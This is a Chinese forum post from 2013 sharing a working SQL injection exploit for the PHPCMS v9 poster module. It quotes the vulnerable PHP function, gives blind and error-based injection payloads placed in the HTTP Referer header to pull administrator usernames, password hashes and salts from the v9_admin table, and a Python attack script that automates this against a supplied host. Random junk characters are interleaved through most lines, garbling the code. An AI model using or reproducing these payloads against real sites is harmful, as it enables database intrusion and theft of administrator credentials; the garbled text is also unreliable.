有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
$ f& S8 X. t" U7 i0 D3 i: A3 l; G: j' R2 ~9 S
问题函数\phpcms\modules\poster\index.php
( N: j: [. F t( u6 J% l' R0 V1 K! } \, C
public function poster_click() {
$ L/ m+ p3 ^* y. S1 d9 ^$id = isset($_GET['id']) ? intval($_GET['id']) : 0;2 p7 }7 R! V6 t+ d$ d
$r = $this->db->get_one(array('id'=>$id));
7 }% S2 @* q( {3 E/ oif (!is_array($r) && empty($r)) return false;6 ^" A7 d. B M3 L" }! i$ }
$ip_area = pc_base::load_sys_class('ip_area');, D m) Z) u2 ]& [7 Z
$ip = ip();
7 y3 i0 _* e) e) b# A$ j1 [$ n$area = $ip_area->get($ip);
7 H6 j- X2 W9 g' O( {$username = param::get_cookie('username') ? param::get_cookie('username') : '';
Z/ Z7 y' ]+ a# q0 ?1 @% q& X8 oif($id) {
5 p, K& [, p$ J( \) Y) D% j5 s$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();# p6 G: v0 N8 I
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
: b& c1 w7 G z+ e6 \: s5 w2 c}: t4 u0 A) d% K: L- W
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
! N& l! e1 Y- `& |$setting = string2array($r['setting']);
! T0 z/ x4 M4 y( dif (count($setting)==1) {: S' Q# C$ l6 E9 o# ?# `! a5 }) c
$url = $setting['1']['linkurl'];
9 H5 c i. ~6 u6 M- \} else {7 s6 y$ U. x4 I) B7 f, T' Z
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];+ b# N# j8 g2 a4 {
}
. z1 W9 f6 O. V* a( cheader('Location: '.$url);
' b8 R1 `! I6 }}
h `$ G4 o$ ~8 M: k, f) w
& k& F& d8 T- W9 o6 _$ I2 R# { 0 l& z# a/ H6 l3 x
( _0 q3 V9 \& \! J* D" `9 d利用方式:6 r( Q( z5 N; y* t
2 }% p& _, {5 U& Q$ p! Q1、可以采用盲注入的手法:
1 F1 C% }6 ]. C5 a O/ c% _. F/ K6 b
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#6 V! ]5 f8 ? }
0 s: z( f# U& I, Q) d: L: y& n* ?' s; U7 i
通过返回页面,正常与否一个个猜解密码字段。
$ y* @& L2 Z* ~' M e4 T6 P% m! b/ g9 Q
2、代码是花开写的,随手附上了:
) W; w5 }4 L% J3 A( f7 L, ^! [# N! U0 b
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
1 T0 L# @0 c( j* _1 L" U1 T6 @! l s
此方法是爆错注入手法,原理自查。
( S( |. _& K+ P- L D% d5 \8 @$ }% m2 e
5 M( G/ ]( c3 O L$ {2 r
1 ]3 u8 m$ M1 W1 m+ i1 @3 K* p利用程序:
" Y; J2 s3 p A8 t) q/ _8 X4 g9 w% l
#!/usr/bin/env python
' {4 O: ^# D+ _, m; {3 fimport httplib,sys,re
7 q) {4 S0 T6 Z: v* {, r1 L& E/ f9 K* [. X6 P u
def attack():* l8 }3 c; v1 ?7 J0 t
print “Code by Pax.Mac Team conqu3r!”
- Z, u( D8 S! h! p3 s3 _print “Welcome to our zone!!!”
# p2 Y5 k; a9 T. ]; iurl=sys.argv[1]
( Z* X( y. \# V5 j h' Zpaths=sys.argv[2]! |( o) J2 j& F" E. y
conn = httplib.HTTPConnection(url)
# P/ m8 e `7 ri_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,, S& I, p M7 E: S; E" e0 s5 ^! u
“Accept”: “text/plain”,
- u& f2 Y3 w% X“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}* _. J4 _' B( `, H i& K
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
8 ]. H' U# h R7 D. A! kr1 = conn.getresponse()( s- Z+ H0 @8 W, A; I
datas=r1.read()& N: t' P/ g3 ~, H& |- O
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
4 W8 J+ w( a# @print datas[0]
}9 l5 `# n X1 R( b4 Kconn.close()
" l' K Z+ p% D! q* Q1 O* d; l4 Kif __name__==”__main__”:
, Z$ U6 ?# T" p' `if len(sys.argv)<3:
2 s! E3 i" R0 |3 Q. Bprint “Code by Pax.Mac Team conqu3r”
- S" V7 Z( Q7 Pprint “Usgae:”
8 W& E d% \, I* T7 Pprint “ phpcmsattack.py www.paxmac.org /”
1 {2 W2 C; q( w- gprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
* F4 O! M- k3 x/ c3 t2 z- Xsys.exit(1)+ {& m, d1 C9 K/ l y' ?% C; |
attack()
2 V9 h( R/ O- X, v# w1 \2 u$ p, m
. r! W) U4 W1 H+ R# o ?! Z+ m) O |
发表于 2013-1-11 21:01:00
收藏
支持
反对